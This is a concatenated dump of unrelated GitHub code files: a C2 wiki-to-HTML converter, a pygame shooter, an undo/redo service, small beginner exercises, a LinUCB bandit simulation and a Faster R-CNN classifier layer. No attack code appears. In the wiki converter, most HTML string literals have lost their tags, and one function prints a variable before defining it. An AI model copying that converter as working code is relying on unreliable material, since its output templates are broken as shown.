return obj\n\n def to_html(self):\n return '\\n'.join(self.to_html_lines())\n\n\n@dataclass\nclass Article(WikiText):\n name: str\n parts: list\n\n def to_html_lines(self):\n return [\n '',\n '',\n ' ',\n f' ',\n ' ',\n ' ',\n ' ',\n ' ',\n ' ',\n '
',\n '

',\n ' ',\n f' {self.name}',\n '

'\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
',\n ' ',\n ''\n ]\n\n\n###\n### Multiline constructs\n###\n\n@dataclass\nclass Paragraph(WikiText):\n lines: list\n\n def to_html_lines(self):\n return [\n '

',\n ] + [\n f' {line.to_html()}' for line in self.lines\n ] + [\n '

'\n ]\n\n\n@dataclass\nclass OrderedList(WikiText):\n items: list\n\n def to_html_lines(self):\n return [\n '
    '\n ] + [\n f' {line}'\n for item in self.items\n for line in item.to_html_lines()\n ] + [\n '
'\n ]\n\n\n@dataclass\nclass UnorderedList(WikiText):\n items: list\n\n def to_html_lines(self):\n return [\n ''\n ]\n\n\n@dataclass\nclass MonospaceBlock(WikiText):\n lines: list\n\n def to_html_lines(self):\n return [\n ''\n ] + [\n f' {line.to_html()}
'\n for line in self.lines\n ] + [\n '
'\n ]\n\n###\n### Line level constructs\n###\n\n\n@dataclass\nclass ParagraphBreak(WikiText):\n def to_html_lines(self):\n return []\n\n\n@dataclass\nclass HorizontalRule(WikiText):\n def to_html_lines(self):\n return ['
']\n\n\n@dataclass\nclass Line(WikiText):\n parts: list\n\n def to_html(self):\n return ''.join([ part.to_html() for part in self.parts ])\n\n def to_html_lines(self):\n return [ self.to_html() ]\n\n\n@dataclass\nclass MonospaceLine(WikiText):\n indent: str\n parts: str\n\n def to_html(self):\n return ''.join([ part.to_html() for part in self.parts ])\n\n@dataclass\nclass UnorderedListItem(WikiText):\n indent: int\n stars: int\n parts: list\n\n def to_html_lines(self):\n return [\n '
  • '\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
  • '\n ]\n\n\n@dataclass\nclass OrderedListItem(WikiText):\n indent: str\n parts: list\n\n def to_html_lines(self):\n return [\n '
  • '\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
  • '\n ]\n\n\n@dataclass\nclass Definition(WikiText):\n term: list\n definition: list\n\n def to_html_lines(self):\n return [\n '
    ',\n f'
    {\"\".join([ part.to_html() for part in self.term ])}
    ',\n f'
    {\"\".join([ part.to_html() for part in self.definition ])}
    ',\n '
    '\n ]\n\ndef separate_paragraphs(lines):\n\n par_lines = paragraph_lines(lines)\n\n return par_lines\n\n\n# detect each kind of line and parse it\ndef paragraph_lines(lines):\n lines = [*lines]\n par_lines = []\n\n while lines:\n l = lines[0]\n lines = lines[1:]\n\n # detect paragraph breaks by whitspace lines\n if re.match(r'^\\s*$', l):\n par_lines.append(ParagraphBreak())\n continue\n\n # detect horizontal rules\n m = re.match(r'^-----*([^-]*)$', l)\n if m:\n par_lines.append(HorizontalRule())\n rest = m.group(1)\n if rest != '':\n lines = [rest] + lines\n continue\n\n # detect unordered list items\n m = re.match(r'^(\\s*)(\\*+)([^\\*].*)$', l)\n if m:\n indent = len(m.group(1))\n stars = len(m.group(2))\n text = m.group(3)\n par_lines.append(UnorderedListItem(indent, stars, [Line(convert_text(text))]))\n continue\n\n # detect ordered list items\n m = re.match(r'^(\\s*)\\d+\\.?([^\\*].*)$', l)\n if m:\n indent = len(m.group(1))\n text = m.group(2)\n par_lines.append(OrderedListItem(indent, [Line(convert_text(text))]))\n continue\n\n # detect a definition\n m = re.match(r'^\\t([^:]+):\\t(.*)$', l)\n if m:\n term = m.group(1)\n definition = m.group(2)\n par_lines.append(Definition(\n convert_text(term), convert_text(definition)))\n continue\n\n # detect monospace font\n m = re.match(r'^(\\s+)([^ ].*)$', l)\n if m:\n indent = m.group(1)\n text = m.group(2)\n par_lines.append(MonospaceLine(indent, convert_text(text)))\n continue\n\n par_lines.append(Line(convert_text(l)))\n\n return par_lines\n\n# combine lines into higher level structures\n\n\ndef group_by(xs, f):\n groups = []\n\n for x in xs:\n if len(groups) == 0 or f(x) != groups[-1][0]:\n groups.append((f(x), []))\n\n groups[-1][1].append(x)\n\n return groups\n\n\ndef convert_group(cls, items):\n\n if cls == ParagraphBreak:\n return []\n\n elif cls == HorizontalRule:\n return items\n\n elif cls == Line:\n return [Paragraph(items)]\n\n elif cls == MonospaceLine:\n return [MonospaceBlock(items)]\n\n elif cls == Definition:\n return items\n\n elif cls == 'ListItem':\n return convert_lists(items)\n\n raise ValueError(cls)\n\n\ndef total_indent(li):\n if isinstance(li, OrderedListItem):\n return li.indent\n elif isinstance(li, UnorderedListItem):\n return li.indent + li.stars-1\n\n\ndef convert_lists(items):\n parts = []\n\n for item in items:\n if len(parts) == 0:\n parts.append((item, []))\n elif total_indent(item) == total_indent(parts[0][0]):\n parts.append((item, []))\n else:\n parts[-1][1].append(item)\n\n\n new_items = []\n for root, subitems in parts:\n # print('------------------')\n # print(f'ROOT: {root}')\n # print(subitems)\n root.parts += convert_lists(subitems)\n new_items.append(root)\n # exit()\n grouped_items = group_by(new_items, lambda x: x.__class__)\n\n lists = []\n for cls, lis in grouped_items:\n if cls == UnorderedListItem:\n lists.append(UnorderedList(lis))\n elif cls == OrderedListItem:\n lists.append(OrderedList(lis))\n\n return lists\n\n\ndef convert_items(items):\n def f(x):\n if isinstance(x, OrderedListItem) or isinstance(x, UnorderedListItem):\n return 'ListItem'\n else:\n return x.__class__\n print(f'groups {groups}')\n groups = group_by(items, f)\n return [\n item\n for cls, items2 in groups\n for item in convert_group(cls, items2)\n ]\n\n\n# def group_\n\n###\n### Sub-line level constructs\n###\n\n\n@dataclass\nclass Text(WikiText):\n text: str\n\n def to_html(self):\n return self.text\n\n\n@dataclass\nclass WikiWord(WikiText):\n wikiword: str\n\n def to_html(self):\n if self.wikiword in KNOWN_TITLES:\n return f'{self.wikiword}'\n else:\n return self.wikiword\n\n@dataclass\nclass URL(WikiText):\n url: str\n\n def to_html(self):\n if re.search(r'(jpe?g|png|gif|webp)', self.url, flags=re.IGNORECASE):\n return f''\n else:\n return f'{self.url}'\n\n\n@dataclass\nclass Italic(WikiText):\n parts: list\n\n def to_html(self):\n return f'{\"\".join([ part.to_html() for part in self.parts ])}'\n\n\n@dataclass\nclass Bold(WikiText):\n parts: list\n\n def to_html(self):\n return f'{\"\".join([ part.to_html() for part in self.parts ])}'\n\n\ndef read_leaf_text(text):\n m = re.match(\"[^']+('[^']+)*|('[^']+)+\", text)\n if not m:\n return None\n end = len(m.group(0))\n return (Text(text[:end]), text[end:])\n\n\ndef read_leaf_italic(text):\n m = re.match(\"''\", text)\n if not m:\n return None\n\n res = read_leaf_text(text[2:])\n if not res:\n return None\n\n leaf_text, rest = res\n\n m2 = re.match(\"''\", rest)\n if not m2:\n return None\n\n return Italic([leaf_text]), rest[2:]\n\n\ndef read_leaf_italic_no_close(text):\n m = re.match(\"''\", text)\n if not m:\n return None\n\n res = read_leaf_text(text[2:])\n if not res:\n return None\n\n leaf_text, rest = res\n if res != '':\n return None\n\n return Italic([leaf_text]), ''\n\n\ndef read_leaf_bold(text):\n m = re.match(\"'''\", text)\n if not m:\n return None\n\n res = read_leaf_text(text[2:])\n if not res:\n return None\n\n leaf_text, rest = res\n\n m2 = re.match(\"'''\", rest)\n if not m2:\n return None\n\n return Bold([leaf_text]), rest[2:]\n\n\ndef read_leaf_bold_no_close(text):\n m = re.match(\"'''\", text)\n if not m:\n return None\n\n res = read_leaf_text(text[2:])\n if not res:\n return None\n\n leaf_text, rest = res\n if res != '':\n return None\n\n return Bold([leaf_text]), ''\n\n\ndef read_italic(text):\n m = re.match(\"''\", text)\n if not m:\n return None\n\n text = text[2:]\n parts = []\n\n while True:\n m2 = re.match(\"''\", text)\n if m2:\n text = text[2:]\n break\n\n res = read_leaf_text(text) or read_leaf_bold(text)\n if res:\n part, rest = res\n parts.append(part)\n text = rest\n continue\n\n return None\n\n return Italic(parts), text\n\n\ndef read_italic_no_close(text):\n m = re.match(\"''\", text)\n if not m:\n return None\n\n text = text[2:]\n parts = []\n\n while True:\n if text == '':\n break\n\n res = read_leaf_text(text) or read_leaf_bold(text)\n if res:\n part, rest = res\n parts.append(part)\n text = rest\n continue\n\n res = read_leaf_bold_no_close(text)\n if res:\n part, _ = res\n parts.append(part)\n break\n\n return None\n\n return Italic(parts), ''\n\n\ndef read_bold(text):\n m = re.match(\"'''\", text)\n if not m:\n return None\n\n text = text[3:]\n parts = []\n\n while True:\n m2 = re.match(\"'''\", text)\n if m2:\n text = text[3:]\n break\n\n res = read_leaf_text(text) or read_leaf_italic(text)\n if res:\n part, rest = res\n parts.append(part)\n text = rest\n continue\n\n return None\n\n return Bold(parts), text\n\n\ndef read_bold_no_close(text):\n m = re.match(\"'''\", text)\n if not m:\n return None\n\n text = text[3:]\n parts = []\n\n while True:\n if text == '':\n break\n\n res = read_leaf_text(text) or read_leaf_italic(text)\n if res:\n part, rest = res\n parts.append(part)\n text = rest\n continue\n\n res = read_leaf_italic_no_close(text)\n if res:\n part, _ = res\n parts.append(part)\n break\n\n return None\n\n return Bold(parts), ''\n\n\ndef read_six_single_quotes(text):\n m = re.match(\"''''''\", text)\n if not m:\n return None\n\n return text[6:]\n\n\ndef convert_text(text):\n parts = []\n urls = []\n start_part = 0\n for m in re.finditer(r\"\\b(https?|ftps?|gopher|mailto|news):[A-Za-z0-9\\-\\._~:/\\?#\\[\\]@!\\$&'\\(\\)\\*\\+\\,\\;\\%\\=]+\", text):\n url_start = m.start()\n url_end = m.end()\n parts.append(convert_text_no_urls(text[start_part:url_start]))\n urls.append(text[url_start:url_end])\n start_part = url_end\n parts.append(convert_text_no_urls(text[start_part:]))\n\n converted = []\n for i in range(len(urls)):\n converted += parts[i]\n converted.append(URL(urls[i]))\n converted += parts[-1]\n return converted\n\ndef convert_text_no_urls(text):\n parts = []\n wikiwords = []\n start_part = 0\n for m in re.finditer(r'\\b([A-Z][a-z]+([A-Z][a-z]*)+)\\b', text):\n ww_start = m.start()\n ww_end = m.end()\n parts.append(convert_text_no_urls_no_wikiwords(text[start_part:ww_start]))\n wikiwords.append(text[ww_start:ww_end])\n start_part = ww_end\n parts.append(convert_text_no_urls_no_wikiwords(text[start_part:]))\n\n converted = []\n for i in range(len(wikiwords)):\n converted += parts[i]\n converted.append(WikiWord(wikiwords[i]))\n converted += parts[-1]\n return converted\n\ndef convert_text_no_urls_no_wikiwords(text):\n text = text.replace(\"''''''\", '')\n parts = []\n\n under_single_quotes = False\n while text:\n res = read_six_single_quotes(text)\n if res:\n text = res\n continue\n\n res = read_leaf_text(text) or\\\n read_bold(text) or\\\n read_bold_no_close(text) or\\\n read_italic(text) or\\\n read_italic_no_close(text) or\\\n None\n if res:\n part, text = res\n parts.append(part)\n # print(part, text)\n continue\n\n first = text[0]\n res = read_leaf_text(text[1:])\n if not res:\n text = text[1:]\n parts.append(Text(first))\n else:\n part, text = res\n parts.append(Text(first + part.text))\n\n # print(parts)\n\n return parts\n\n\ndef title(s):\n return ' '.join([\n m.group(0)\n for m in re.finditer(r'[A-Z][a-z]+', s)\n ])\n\n\ndef process_article(in_article_path, out_dir_path):\n m = re.search(r'.*/([A-Za-z]+)\\.txt$', in_article_path)\n if not m:\n return None\n\n t = m.group(1)\n\n with open(in_article_path, 'r') as f:\n lines = f.read().split('\\n')\n\n # print('\\n'.join(lines))\n lines = separate_paragraphs(lines)\n article = Article(title(t), convert_items(lines))\n\n with open(os.path.join(out_dir_path, t + '.html'), 'w') as f:\n f.write(article.to_html())\n\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print('please provide an input directory path, output directory path, and a base url')\n exit()\n\n in_dir_path = sys.argv[1]\n out_dir_path = sys.argv[2]\n BASE_URL = sys.argv[3]\n\n if not os.path.isdir(in_dir_path):\n print('input directory path is not a directory')\n exit()\n\n if not os.path.isdir(out_dir_path):\n print('output directory path is not a directory')\n exit()\n\n shutil.copy('wiki.gif', out_dir_path)\n shutil.copy('style.css', out_dir_path)\n\n for root, _, files in os.walk(in_dir_path):\n KNOWN_TITLES = [ name[:-4] for name in files ]\n for i, file in enumerate(sorted(files)):\n print(f'Processing {i/len(files): >4.1%}: {os.path.join(in_dir_path, file)}...')\n process_article(os.path.join(in_dir_path, file), out_dir_path)\n\n # with open(in_path, 'r') as f:\n # lines = f.read().split('\\n')\n #\n # # print('\\n'.join(lines))\n # lines = separate_paragraphs(lines)\n # article = Article(title('ThisIsTheTitle'), convert_items(lines))\n #\n # for line in article.to_html_lines():\n # print(line)\n","repo_name":"BekaValentine/c2_wiki_recovery","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14790843261","text":"\nimport pygame\nfrom player import Player\nfrom monster import Alien, Monster, Mummy\nfrom comet_event import CometFallEvent\nfrom sounds import SoundManager\n\nclass Game:\n def __init__(self):\n # est-ce que le jeu est lancer ou non ?\n self.is_playing = False\n # generer notre joueur\n # groupe de sprite de joueur ? \n self.all_players = pygame.sprite.Group()# groupe de sprite vierge\n self.player = Player(self)\n self.all_players.add(self.player)\n # generer un manageur de chute de comette\n self.comet_event = CometFallEvent(self)\n # on met le score à 0\n self.score = 0\n\n # on viens gerer le son\n self.sound_manager = SoundManager()\n \n # charger notre police custom\n self.font = pygame.font.Font('Dancing_Script/static/DancingScript-Bold.ttf', 50)\n\n # groupe de monstre\n self.all_monsters = pygame.sprite.Group()# groupe de sprite vierge\n # on enregistre les touche active par le joueur\n self.pressed = {}\n\n def start(self):\n self.is_playing = True\n self.spawn_monster(Mummy)\n self.spawn_monster(Mummy)\n self.spawn_monster(Alien)\n\n def add_score(self, point=10):\n self.score += point\n\n def game_over(self):\n # retirer les monstres, remettre les point de vie du joueur, et mettre le jeu en pause\n # retirer les monstre\n self.all_monsters = pygame.sprite.Group()\n #retirer les cometes\n self.comet_event.all_comets = pygame.sprite.Group()\n # restaurer la bar de chargement\n self.comet_event.reset_percent()\n # remettre les points de vie du joueur\n self.player.health = self.player.max_health\n # remettre le jeu en pause\n self.is_playing = False\n # on remet le score à zero \n self.score = 0\n # on viens jouer le son\n self.sound_manager.play('game_over')\n\n def update(self, screen):\n\n score_text = self.font.render(f'Score: {self.score}', 1, (0, 0, 0))\n # on inject sur la fenetre\n screen.blit(score_text, (20, 20))\n \n # récuperer l'animation du joueur\n self.player.update_animation()\n # appliquer l'image de notre joueur\n screen.blit(self.player.image, self.player.rect)# (largeur, hauteur)\n # actualiser la bar de vie du joueur\n self.player.update_health_bar(screen)\n\n self.comet_event.update_bar(screen)\n\n\n # recuperer les projectille du joueur\n for projectile in self.player.all_projectiles:\n projectile.move()\n # appliquer l'ensemble des images de nos projectiles\n self.player.all_projectiles.draw(screen)\n\n # recuperer les comets de notre jeux\n for comet in self.comet_event.all_comets:\n comet.fall()\n # appliquer l'ensemble des images de nos comets\n self.comet_event.all_comets.draw(screen)\n\n\n\n # recuperer les monstre de notre jeux\n for monster in self.all_monsters:\n monster.forward()\n monster.update_health_bar(screen)\n monster.update_animation()\n # appliquer l'image du monstre\n self.all_monsters.draw(screen)\n\n # verifier si le joueur souhaite aller à droite ou à gauche\n if self.pressed.get(pygame.K_RIGHT) and self.player.rect.x + self.player.rect.width < screen.get_width() + 75:\n self.player.move_right()\n \n elif self.pressed.get(pygame.K_LEFT) and self.player.rect.x > -75:\n self.player.move_left()\n\n def spawn_monster(self, monster_classe_name):\n self.all_monsters.add(monster_classe_name.__call__(self))# call permet d'instancier l'objet\n\n def check_collision(self, sprite, group):\n return pygame.sprite .spritecollide(sprite, group, False, pygame.sprite.collide_mask)\n\n","repo_name":"zocainViken/pygame","sub_path":"tuto_graven_shooter/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13097313319","text":"from src.domain.command_pattern import *\nimport functools\n\n\nclass RedoService:\n def __init__(self, redo_repository, undo_repository):\n self.__data = redo_repository\n self.__undo_repository = undo_repository\n\n def add_in(self, function_redo, down_redo, parameters_redo, function_undo, down_undo\n , parameters_undo):\n redo_operation = undo(function_redo, *parameters_redo)\n undo_operation = undo(function_undo, *parameters_undo)\n self.__data.add_in(redo_operation, down_redo, undo_operation, down_undo)\n\n def pop_out(self):\n next = True\n operations = []\n while next == True:\n redo_operation, down_redo, undo_operation, down_undo = self.__data.pop_operation()\n next = down_redo\n if redo_operation.function is not None:\n execute = functools.partial(redo_operation.function, *redo_operation.parameters)\n execute()\n operations.append((redo_operation, down_redo, undo_operation, down_undo))\n for index in range(len(operations) - 1, -1, -1):\n self.__undo_repository.add_operation(operations[index][2], operations[index][3], operations[index][0],\n operations[index][1])\n # return redo_operation, down_redo, undo_operation, down_undo\n\n def clear(self):\n self.__data.clear()\n","repo_name":"davidalexandru1370/a678fp","sub_path":"services/redo_service.py","file_name":"redo_service.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29048389330","text":"#Kris Hanks\n#COE332 - Homework 1\n\nimport names\n\ndiffnames = [] #stores the different names\n\ni = 0 #counts the number of diff names\nwhile i in range(5):\n tempname = names.get_full_name()\n #check if its a different name\n if tempname not in diffnames:\n #print the name\n print( tempname, len(tempname), sep = ', ')\n #add the new name to the list\n diffnames.append(tempname)\n #increase count of names found\n i +=1\n\n\n","repo_name":"khanks0217/homework01","sub_path":"script03.py","file_name":"script03.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39358965556","text":"def main():\r\n number = int(input().strip())\r\n num = 1\r\n count = 0\r\n for _ in range(number):\r\n if count < num:\r\n count += 1\r\n else:\r\n num += 1\r\n count = 1\r\n\r\n print(num, end=\" \")\r\n\r\n\r\n# start program\r\nmain()","repo_name":"igaryok/stepik_python","sub_path":"sequance.py","file_name":"sequance.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30645606420","text":"import csv\nimport sys\nfrom tabulate import tabulate\n\ndef table(infile):\n table = []\n for row in infile:\n table.append(row)\n return tabulate(table[1:], table[0], tablefmt=\"grid\")\n\nif len(sys.argv) < 2:\n sys.exit(\"Too few command-line arguments\")\nelif len(sys.argv) > 2:\n sys.exit(\"Too many command-line arguments\")\nelif (sys.argv[1][-3:] != \"csv\"):\n sys.exit(\"Not a CSV file\")\nelse:\n while True:\n try:\n with open(sys.argv[1]) as csvfile:\n reader = csv.reader(csvfile)\n print(table(reader))\n sys.exit(0)\n except FileNotFoundError:\n sys.exit(\"File does not exist\")","repo_name":"nashira26/CS50","sub_path":"CS50P - 2022/Week 6/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26324167147","text":"from capitals import states\nimport random\n\n# correct +=1\n# wrong +=5\n\n# print(f\"# correct = {correct} and number incorrect = {wrong} \\n\")\n# print(states)\nprint(\"Welcome to the states and Capitals game. You'll be given a State, enter the Capital if you know it. Type it with a Cap letter where appropriate... ex...atlanta incorrect Atlanta correct\")\n\ndef states_caps_game():\n random.shuffle(states)\n correct = 0\n wrong = 0\n hint = 'hint'\n\n for state in states:\n this_state = state['name']\n this_capital = state['capital']\n print(\"remember to Capatialize .. atlanta incorrect but Atlanta correct\")\n print(\" Your current question is below ... \")\n user_input = input(\n f\"What is the capital of {this_state}? You stuck? type hint for a clue\\n\")\n\n if user_input == hint:\n user_input = input(\n f\"What is the capital of {this_state}? ... hint it starts with ... {this_capital[0]}{this_capital[1]}{this_capital[2]}\\n\")\n if user_input == this_capital:\n correct += 1\n print(\n f\" you got it right ... # correct = {correct} and number incorrect = {wrong} \\n\")\n else:\n wrong += 1\n print(\n f\" that was not right it was {this_capital}... # correct = {correct} and number incorrect = {wrong} \\n\")\n elif user_input == this_capital:\n correct += 1\n print(\n f\" you got it right ... # correct = {correct} and number incorrect = {wrong} \\n\")\n else:\n wrong += 1\n print(\n f\" that was not right it was {this_capital}... # correct = {correct} and number incorrect = {wrong} \\n\")\n\n print(\n f\"That's all of them . Final score for you was ... # correct = {correct} and number incorrect = {wrong} \\n\")\n\n play_again = input(\"Wanna do it all over again? type yes or no \\n\")\n if play_again == \"yes\":\n states_caps_game()\n else:\n print(\"Well so long now and bye-bye then... thanks for playing\")\n exit()\n\nstates_caps_game()\n","repo_name":"BrianLoveGa/state-capitals-python","sub_path":"lib/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25830667817","text":"'''o. Dado un número entero, cuente sus divisores enteros exactos.\r\nSolución\r\nVariables\r\nn: número entero positivo (dato)\r\nx: cada número entero entre 1 y n, posible divisor de n\r\nc: cantidad de divisores'''\r\n\r\nn=int(input('Ingrese un entero positivo: '))\r\nc=0\r\nfor d in range (1,n+1):\r\n if n%d==0:\r\n c=c+1\r\nprint('Cantidad de divisores: ',c)","repo_name":"Snake111213/scrips-para-los-alunmos","sub_path":"Ejercicios para los alunmnos/DivisoresDeUnEntero.py","file_name":"DivisoresDeUnEntero.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28756379066","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport ast\nfrom tqdm import tqdm\n\n\n\n# Create class object for a single linear ucb arm\nclass linucb_arm():\n\n def __init__(self, arm_index, d, alpha):\n # Track arm index\n self.arm_index = arm_index\n\n # Keep track of alpha\n self.alpha = alpha\n self.N = 0\n\n def calc_UCB(self, x_array, theta, A):\n # Find A inverse for ridge regression\n A_inv = np.linalg.inv(A)\n # print(\"A:\", A)\n\n # Reshape covariates input into (d x 1) shape vector\n x = x_array.reshape([-1, 1])\n # print(\"x:\",x)\n # Find ucb based on p formulation (mean + std_dev)\n # p is (1 x 1) dimension vector\n p = np.dot(theta.T, x) + self.alpha * np.sqrt(np.dot(x.T, np.dot(A_inv, x)))\n # print('p:',p)\n return p\n\n def update(self):\n self.N += 1\n\n\nclass linucb_policy():\n\n def __init__(self, K_arms, d, alpha):\n self.K_arms = K_arms\n self.linucb_arms = [linucb_arm(arm_index=i, d=d, alpha=alpha) for i in range(K_arms)]\n self.chosen_arm = -1\n self.d = d\n self.theta = None\n # Random Arm Context Generation\n self.arm_context = [np.random.random((10, 1)) for i in range(0,self.K_arms)]\n\n\n # A: (d x d) matrix = D_a.T * D_a + I_d.\n # The inverse of A is used in ridge regression\n self.A = np.identity(d)\n\n # b: (d x 1) corresponding response vector.\n # Equals to D_a.T * c_a in ridge regression formulation\n self.b = np.zeros([d, 1])\n\n def calc_theta(self):\n A_inv = np.linalg.inv(self.A)\n self.theta = np.dot(A_inv, self.b)\n return self.theta\n\n def reward_update(self, reward, x):\n # Reshape covariates input into (d x 1) shape vector\n x = x.reshape([-1, 1])\n\n # Update A which is (d * d) matrix.\n self.A += np.dot(x, x.T)\n\n # Update b which is (d x 1) vector\n # reward is scalar\n self.b += reward * x\n\n def printBandits(self):\n print(\"num times selected each bandit:\", [b.N for b in self.linucb_arms])\n\n def calculate_projection(self,arm_index, user_features, arm_features):\n context = np.zeros((1010, 1))\n context[arm_index*10:arm_index*10+100] = user_features\n context[1000:] = arm_features\n return context\n\n\n def select_arm(self, x_array):\n # Initiate ucb to be 0\n highest_ucb = -10\n\n # Track index of arms to be selected on if they have the max UCB.\n candidate_arms = []\n theta = self.calc_theta()\n\n for arm_index in range(self.K_arms):\n # Calculating projection of user on the arm\n user_context = x_array\n arm_context = self.arm_context[arm_index]\n projection = self.calculate_projection(arm_index, user_context, arm_context)\n\n # Calculate ucb based on each arm using current covariates at time t\n\n arm_ucb = self.linucb_arms[arm_index].calc_UCB(projection, theta,\n self.A)\n # If current arm is highest than current highest_ucb\n if arm_ucb > highest_ucb:\n # Set new max ucb\n highest_ucb = arm_ucb\n\n # Reset candidate_arms list with new entry based on current arm\n candidate_arms = [arm_index]\n\n # If there is a tie, append to candidate_arms\n if arm_ucb == highest_ucb:\n if arm_index not in candidate_arms:\n candidate_arms.append(arm_index)\n\n # Choose based on candidate_arms randomly (tie breaker)\n # print('last step:', candidate_arms)\n chosen_arm = np.random.choice(candidate_arms)\n self.linucb_arms[chosen_arm].update()\n self.chosen_arm = chosen_arm\n\n return chosen_arm\n\n\n\ndef ctr_simulator(K_arms, d, alpha, data_path):\n # Initiate policy\n linucb_policy_object = linucb_policy(K_arms=K_arms, d=d, alpha=alpha)\n\n # Instantiate trackers\n aligned_time_steps = 0\n cumulative_rewards = 0\n aligned_ctr = []\n unaligned_ctr = [] # for unaligned time steps\n\n # Open data\n with open(data_path, \"r\") as f:\n\n for line_data in tqdm(f, total=10000):\n\n # 1st column: Logged data arm.\n # Integer data type\n data_arm = int(line_data.split()[0])\n\n # 2nd column: Logged data reward for logged chosen arm\n # Float data type\n data_reward = float(line_data.split()[1])\n\n # 3rd columns onwards: 100 covariates. Keep in array of dimensions (100,) with float data type\n covariate_string_list = line_data.split()[2:]\n data_x_array = np.array([float(covariate_elem) for covariate_elem in covariate_string_list])\n data_x_array = np.linalg.norm(data_x_array)\n # Find policy's chosen arm based on input covariates at current time step\n arm_index = linucb_policy_object.select_arm(data_x_array)\n\n # Check if arm_index is the same as data_arm (ie same actions were chosen)\n # Note that data_arms index range from 1 to 10 while policy arms index range from 0 to 9.\n if arm_index + 1 == data_arm:\n # calculating projection\n user_context = data_x_array\n arm_context = linucb_policy_object.arm_context[arm_index]\n projection = linucb_policy_object.calculate_projection(arm_index, user_context, arm_context)\n # Use reward information for the chosen arm to update\n\n linucb_policy_object.reward_update(data_reward, projection)\n\n # For CTR calculation\n aligned_time_steps += 1\n cumulative_rewards += data_reward\n aligned_ctr.append(cumulative_rewards / aligned_time_steps)\n linucb_policy_object.printBandits()\n return aligned_time_steps, cumulative_rewards, aligned_ctr, linucb_policy_object\n\n\nif __name__ == \"__main__\":\n argv = sys.argv\n # alpha_inputs = ast.literal_eval(argv[1])\n alpha_inputs = [0.1]\n data_path = \"data/news_dataset.txt\"\n for alpha in alpha_inputs:\n print(f\"Trying with alpha = {alpha}\")\n aligned_time_steps, cum_rewards, aligned_ctr, policy = ctr_simulator(K_arms=10, d=1010, alpha=alpha,\n data_path=data_path)\n print(\"Cumulative Reward: \", cum_rewards)\n plt.plot(aligned_ctr, label=\"alpha = \" + str(alpha))\n plt.ylabel(\"CTR ratio (For Single Theta)\")\n plt.xlabel(\"Time(50 random arm covarriates)\")\n plt.legend()\n plt.show()\n","repo_name":"kcsayem/Parallelization-of-bandit-algorithms-to-reduce-computational-cost-of-news-article-recommendation-sys","sub_path":"old/linucb_linear.py","file_name":"linucb_linear.py","file_ext":"py","file_size_in_byte":6708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18810394587","text":"import sys\r\ninput = sys.stdin.readline\r\nT = int(input().rstrip())\r\nfor _ in range(T):\r\n H, W, N = list(map(int,input().split()))\r\n flag = False\r\n for i in range(1, W+1):\r\n for j in range(1, H+1):\r\n N-=1\r\n if N == 0:\r\n if i <= 9:\r\n print(str(j)+'0'+str(i))\r\n else:\r\n print(str(j)+str(i))\r\n flag=True\r\n break\r\n if flag:\r\n break","repo_name":"ukjinlee66/PS","sub_path":"백준/Bronze/10250. ACM 호텔/ACM 호텔.py","file_name":"ACM 호텔.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20610902956","text":"from .roi_pooling_conv import RoiPoolingConv\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout, TimeDistributed\n\n\ndef classifier_layer(base_layers, input_rois, num_rois, nb_classes):\n \"\"\"Classifier model\"\"\"\n\n pooling_regions = 7\n\n # TimeDistributed layers are used to process ROI areas independently\n # It is used the number of ROI's + an extra dimension (num_rois)\n # out_roi_pool is a list of 4 ROI (7x7x512)\n # out_roi_pool.shape = (1, num_rois, pool_size, pool_size, channels)\n out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])\n\n # Flatten out_roi_pool and connect to 2 Fully-Connected and 2 Dropout layers\n out = TimeDistributed(Flatten(name='flatten'))(out_roi_pool)\n out = TimeDistributed(Dense(4096, activation='relu', name='fc1'))(out)\n out = TimeDistributed(Dropout(0.5))(out)\n out = TimeDistributed(Dense(4096, activation='relu', name='fc2'))(out)\n out = TimeDistributed(Dropout(0.5))(out)\n\n # out_class: Class prediction\n out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'),\n name='dense_class_{}'.format(nb_classes))(out)\n\n # out_regress: Coordinates predictions of the bounding boxes\n out_regress = TimeDistributed(Dense(4 * (nb_classes - 1), activation='linear', kernel_initializer='zero'),\n name='dense_regress_{}'.format(nb_classes))(out)\n\n return [out_class, out_regress]\n","repo_name":"darkhorrow/semantic-segmentation-tgc","sub_path":"faster-rncc/rbnd/rbnd_model/classifier_model.py","file_name":"classifier_model.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26216750071","text":"# https://leetcode.com/problems/maximum-xor-for-each-query/\n# 